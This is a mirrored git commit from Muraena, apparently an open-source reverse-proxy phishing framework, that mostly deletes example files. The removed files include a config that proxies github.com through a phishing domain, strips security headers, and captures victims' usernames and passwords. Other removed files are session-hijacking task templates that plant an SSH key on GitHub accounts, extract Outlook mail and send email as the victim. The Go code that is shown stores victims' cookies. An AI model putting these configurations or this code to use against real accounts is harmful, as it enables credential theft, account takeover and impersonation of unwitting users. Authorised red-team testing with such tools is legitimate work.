mirror of
https://github.com/muraenateam/muraena.git
synced 2026-01-23 02:24:05 +00:00
House cleaning ✨
This commit is contained in:
parent
a0853aa16c
commit
1cbd95dcea
8 changed files with 3 additions and 357 deletions
|
|
@ -1,206 +0,0 @@
|
|||
[proxy]
|
||||
# Phishing domain
|
||||
phishing = "phishing.click"
|
||||
|
||||
# Target domain to proxy
|
||||
destination = "github.com"
|
||||
|
||||
# Listening IP address (IPv4 or IPv6)
|
||||
# e.g. 0.0.0.0 or [::]
|
||||
IP = "127.0.0.1"
|
||||
|
||||
# Listen announces on the local network address.
|
||||
# The network must be "tcp", "tcp4", "tcp6"
|
||||
listener = "tcp4"
|
||||
|
||||
# Listeninng TCP Port
|
||||
port = 443
|
||||
|
||||
# Force HTTP to HTTPS redirection
|
||||
[proxy.HTTPtoHTTPS]
|
||||
enabled = true
|
||||
HTTPport = 80
|
||||
|
||||
|
||||
#
|
||||
# Proxy's replacement rules
|
||||
#
|
||||
[transform]
|
||||
|
||||
# List of content types to exclude from the transformation process
|
||||
skipContentType = [ "font/*", "image/*" ]
|
||||
|
||||
# Enable transformation rules in base64 strings
|
||||
[transform.base64]
|
||||
enabled = false
|
||||
padding = [ "=", "." ]
|
||||
|
||||
[transform.request]
|
||||
headers = [
|
||||
"Cookie",
|
||||
"Referer",
|
||||
"Origin",
|
||||
"X-Forwarded-For"
|
||||
]
|
||||
|
||||
[transform.response]
|
||||
headers = [
|
||||
"Location",
|
||||
"WWW-Authenticate",
|
||||
"Origin",
|
||||
"Set-Cookie",
|
||||
"Access-Control-Allow-Origin"
|
||||
]
|
||||
|
||||
# Generic replacement rules:
|
||||
# it applies to body and any http header enabled for manipulation
|
||||
content = [
|
||||
[ "integrity", "intintint" ]
|
||||
]
|
||||
|
||||
|
||||
#
|
||||
# Proxy's wiping rules
|
||||
#
|
||||
[remove]
|
||||
|
||||
[remove.request]
|
||||
headers = [
|
||||
"X-Forwarded-For"
|
||||
]
|
||||
|
||||
[remove.response]
|
||||
headers = [
|
||||
"Content-Security-Policy",
|
||||
"Content-Security-Policy-Report-Only",
|
||||
"Strict-Transport-Security",
|
||||
"X-XSS-Protection",
|
||||
"X-Content-Type-Options",
|
||||
"X-Frame-Options",
|
||||
"Referrer-Policy",
|
||||
"X-Forwarded-For"
|
||||
]
|
||||
|
||||
#
|
||||
# Rudimental redirection rules
|
||||
#
|
||||
[[drop]]
|
||||
path = "/logout"
|
||||
redirectTo = "https://github.com"
|
||||
|
||||
|
||||
#
|
||||
# LOG
|
||||
#
|
||||
[log]
|
||||
enabled = true
|
||||
filePath = "muraena.log"
|
||||
|
||||
|
||||
#
|
||||
# TLS
|
||||
#
|
||||
[tls]
|
||||
enabled = true
|
||||
|
||||
# Expand allows to replace the content of the certificate/key/root parameters to their content instead of the
|
||||
# filepath
|
||||
expand = false
|
||||
certificate = "./cert.pem"
|
||||
key = "./privkey.pem"
|
||||
root = "./fullchain.pem"
|
||||
|
||||
#
|
||||
# CRAWLER
|
||||
#
|
||||
[crawler]
|
||||
enabled = false
|
||||
depth = 3
|
||||
upto = 20
|
||||
externalOriginPrefix = "cdn-"
|
||||
externalOrigins = [
|
||||
"*.githubassets.com"
|
||||
]
|
||||
|
||||
#
|
||||
# NECROBROWSER
|
||||
#
|
||||
[necrobrowser]
|
||||
enabled = true
|
||||
endpoint = "http://127.0.0.1:3000/instrument"
|
||||
profile = "./config/instrument.github.necro"
|
||||
|
||||
[necrobrowser.keepalive]
|
||||
# GET on an authenticated endpoint to keep the session alive
|
||||
# every keepalive request is processed as its own necrotask
|
||||
enabled = false
|
||||
minutes = 5 # keeps alive the session every 5 minutes
|
||||
|
||||
|
||||
[necrobrowser.trigger]
|
||||
type = "cookies"
|
||||
values = ["user_session", "dotcom_user"] # these are two cookies set by github after successful auth
|
||||
delay = 5 # check every 5 seconds victim's cookie jar to see if we need to instrument something
|
||||
|
||||
|
||||
#
|
||||
# STATIC SERVER
|
||||
#
|
||||
[staticServer]
|
||||
enabled = false
|
||||
port = 8080
|
||||
localPath = "./static/"
|
||||
urlPath = "/evilpath/"
|
||||
|
||||
|
||||
#
|
||||
# WATCHDOG
|
||||
#
|
||||
[watchdog]
|
||||
enabled = true
|
||||
# Monitor rules file changes and reload
|
||||
dynamic = true
|
||||
rules = "./config/watchdog.rules"
|
||||
geoDB = "./config/geoDB.mmdb"
|
||||
|
||||
#
|
||||
# TRACKING
|
||||
#
|
||||
[tracking]
|
||||
enabled = true
|
||||
|
||||
# the tracking below supposes your phishing url will be something like:
|
||||
# https://github.com/GithubProfile/aaa-111-bbb (see regex below)
|
||||
# NOTE: the URL doesn't need to exist, so this is also valid (update identifier accordingly):
|
||||
# https://github.com/GithubProfileFooBar/aaa-111-bbb
|
||||
type = "path"
|
||||
|
||||
# Tracking identifier
|
||||
identifier = "_GithubProfile_"
|
||||
|
||||
# Rule to generate and validate a tracking identifier
|
||||
regex = "[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}"
|
||||
|
||||
# Tracking initial HTTP Header (empty is: If-Range)
|
||||
header = "X-If-Range"
|
||||
|
||||
# Landing HTTP Header (empty is: X-If-Landing-Redirect)
|
||||
landing = "X-If-Landing-Redirect"
|
||||
|
||||
[tracking.urls]
|
||||
credentials = [ "/session" ]
|
||||
|
||||
# we don't need this anymore since we manage via necrobrowser.trigger
|
||||
# authSession = [ "/settings/profile" ]
|
||||
|
||||
[[tracking.patterns]]
|
||||
label = "Username"
|
||||
matching = "login"
|
||||
start = "login="
|
||||
end = "&password="
|
||||
|
||||
[[tracking.patterns]]
|
||||
label = "Password"
|
||||
matching = "password"
|
||||
start = "password="
|
||||
end = "&"
|
||||
|
|
@ -1,21 +0,0 @@
|
|||
{
|
||||
"name": "InstrumentGitHub",
|
||||
"task": {
|
||||
"type": "github",
|
||||
"name": [ "PlantAndDump" ],
|
||||
"params": {
|
||||
"fixSession": "https://github.com/settings/profile",
|
||||
"urls": [
|
||||
"https://github.com/settings/profile",
|
||||
"https://github.com/settings/security-log",
|
||||
"https://github.com/settings/emails",
|
||||
"https://github.com/settings/repositories"
|
||||
],
|
||||
"keywords": ["password", "certificate","vpn","credential","login","https://","access","portal"],
|
||||
"sshKey": "ssh-ed25519 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA key@necro",
|
||||
|
||||
"credentials": %%%CREDENTIALS%%%
|
||||
}
|
||||
},
|
||||
"cookies": %%%COOKIES%%%
|
||||
}
|
||||
|
|
@ -1,7 +0,0 @@
|
|||
{
|
||||
"name": "InstrumentTest",
|
||||
"task": {
|
||||
|
||||
},
|
||||
"cookies": %%%COOKIES%%%
|
||||
}
|
||||
|
|
@ -1,21 +0,0 @@
|
|||
{
|
||||
"name": "dumpEmails",
|
||||
"task": {
|
||||
"type": "office365",
|
||||
"name": [ "OutlookExtrude", "OutlookWriteEmail" ],
|
||||
"params": {
|
||||
"fixSession": "https://outlook.office.com/mail/inbox",
|
||||
"keywords": ["credentials", "microsoft"],
|
||||
|
||||
"writeEmail": {
|
||||
"to": "goku.antani@penitenziagite.onmicrosoft.com",
|
||||
"subject": "All your sessions are belong to us",
|
||||
"data": "NecroBrowser is impersonating this user.\n\nBe ready for mayhem clicking here https://google.com\n\nBye",
|
||||
"attachment": "./testing/attachment.png"
|
||||
},
|
||||
|
||||
"credentials": %%%CREDENTIALS%%%
|
||||
}
|
||||
},
|
||||
"cookies": %%%COOKIES%%%
|
||||
}
|
||||
|
|
@ -326,55 +326,6 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
|
|||
// Replacer object
|
||||
replacer := muraena.Replacer
|
||||
|
||||
//
|
||||
// Garbage ..
|
||||
//
|
||||
|
||||
// DROP
|
||||
// dropRequest := false
|
||||
//
|
||||
// TODO: is this still needed? We redirect Requests in the RequestProcessor
|
||||
// for _, drop := range sess.Config.Redirects {
|
||||
//
|
||||
// if drop.RedirectTo == "" {
|
||||
// continue
|
||||
// }
|
||||
//
|
||||
// // if the drop is empty, it means that we want to drop all the requests
|
||||
// // and we don't want to redirect them
|
||||
// if drop.Hostname == "" && drop.Path == "" && drop.Query == "" {
|
||||
// continue
|
||||
// }
|
||||
//
|
||||
// if drop.Hostname != "" && response.Request.Host != drop.Hostname {
|
||||
// continue
|
||||
// }
|
||||
//
|
||||
// if drop.Path != "" && response.Request.URL.Path != drop.Path {
|
||||
// continue
|
||||
// }
|
||||
//
|
||||
// if drop.Query != "" && response.Request.URL.RawQuery != drop.Query {
|
||||
// continue
|
||||
// }
|
||||
//
|
||||
// // Invalid HTTP code fallback to 302
|
||||
// if drop.HTTPStatusCode == 0 {
|
||||
// drop.HTTPStatusCode = 302
|
||||
// }
|
||||
//
|
||||
// response.StatusCode = drop.HTTPStatusCode
|
||||
// response.Header.Set("Location", drop.RedirectTo)
|
||||
// log.Info("Dropped request %s redirected to: %s", drop.Path, drop.RedirectTo)
|
||||
// // dropRequest = true
|
||||
// // break
|
||||
// return
|
||||
// }
|
||||
|
||||
// if dropRequest {
|
||||
// return
|
||||
// }
|
||||
|
||||
// Add extra HTTP headers
|
||||
for _, header := range sess.Config.Transform.Response.Add.Headers {
|
||||
response.Header.Set(header.Name, header.Value)
|
||||
|
|
@ -427,22 +378,8 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
|
|||
|
||||
log.Verbose("Set-Cookie: %s", response.Header["Set-Cookie"][k])
|
||||
}
|
||||
} else if header == "Location" {
|
||||
// TODO: Cleanup this mess
|
||||
|
||||
//
|
||||
// if len(replacer.SubdomainMap) > 0 {
|
||||
// for _, m := range replacer.SubdomainMap {
|
||||
// if strings.Contains(response.Header.Get(header), m[1]) {
|
||||
// // replace only the first occurrence starting from the left
|
||||
// response.Header.Set(header, strings.Replace(response.Header.Get(header), m[1], m[0], -1))
|
||||
// break
|
||||
// }
|
||||
// }
|
||||
// }
|
||||
|
||||
response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
|
||||
|
||||
// } else if header == "Location" {
|
||||
// response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
|
||||
} else {
|
||||
response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
|
||||
}
|
||||
|
|
@ -478,7 +415,6 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
|
|||
log.Warning("Error: cannot retrieve Victim from tracker: %s", err)
|
||||
}
|
||||
|
||||
// victim := muraena.Tracker.TrackResponse(response)
|
||||
if victim != nil {
|
||||
// before transforming headers like cookies, store the cookies in the CookieJar
|
||||
for _, c := range response.Cookies() {
|
||||
|
|
@ -487,7 +423,6 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
|
|||
}
|
||||
|
||||
c.Domain = strings.Replace(c.Domain, ":443", "", -1)
|
||||
|
||||
sessCookie := db.VictimCookie{
|
||||
Name: c.Name,
|
||||
Value: c.Value,
|
||||
|
|
@ -570,22 +505,11 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
|
|||
// process body and pack again
|
||||
newBody := replacer.Transform(string(responseBuffer), false, base64)
|
||||
|
||||
//
|
||||
// Ugly Google patch
|
||||
//
|
||||
// If request URL contains: AccountsSignInUi/data/batchexecute
|
||||
// the go for another round of patches
|
||||
if strings.Contains(response.Request.URL.Path, "AccountsSignInUi/data/batchexecute") {
|
||||
|
||||
// if body contains the phishing domain
|
||||
if strings.Contains(newBody, muraena.Session.Config.Proxy.Phishing) {
|
||||
// if body contains )]}'\n\n then patch it
|
||||
if strings.HasPrefix(newBody, ")]}'\n\n") {
|
||||
|
||||
// fmt.Println("newBody: ", newBody)
|
||||
newBody = patchGoogleStructs(newBody)
|
||||
// fmt.Println("updated newBody: ", newBody)
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -40,7 +40,7 @@ type Necrobrowser struct {
|
|||
RequestTemplate string
|
||||
}
|
||||
|
||||
// Cookies
|
||||
// SessionCookie structure
|
||||
type SessionCookie struct {
|
||||
Name string `json:"name"`
|
||||
Value string `json:"value"`
|
||||
|
|
|
|||
|
|
@ -451,15 +451,6 @@ func (module *Tracker) TrackResponse(response *http.Response) (t *Trace) {
|
|||
t = module.makeTrace("")
|
||||
|
||||
}
|
||||
// else {
|
||||
// var err error
|
||||
// victim, err = t.GetVictim(t)
|
||||
// if err != nil {
|
||||
// module.Warning("Error: cannot retrieve Victim from tracker: %s", err)
|
||||
// }
|
||||
// }
|
||||
|
||||
// return victim
|
||||
|
||||
return
|
||||
}
|
||||
|
|
@ -525,12 +516,7 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
// if found {
|
||||
// break
|
||||
// }
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if found {
|
||||
|
|
@ -595,10 +581,6 @@ func (t *Trace) ExtractCredentialsFromResponseHeaders(response *http.Response) (
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
// if found {
|
||||
// break
|
||||
// }
|
||||
}
|
||||
|
||||
}
|
||||
|
|
|
|||
|
|
@ -66,8 +66,3 @@ func (m *SessionModule) Err(error error) {
|
|||
func (m *SessionModule) Raw(format string, args ...interface{}) {
|
||||
log.Raw(m.tag+format, args...)
|
||||
}
|
||||
|
||||
// NO Fatal() here, we want to keep the session alive
|
||||
// func (m *SessionModule) Fatal(format string, args ...interface{}) {
|
||||
// log.Fatal(m.tag+format, args...)
|
||||
// }
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue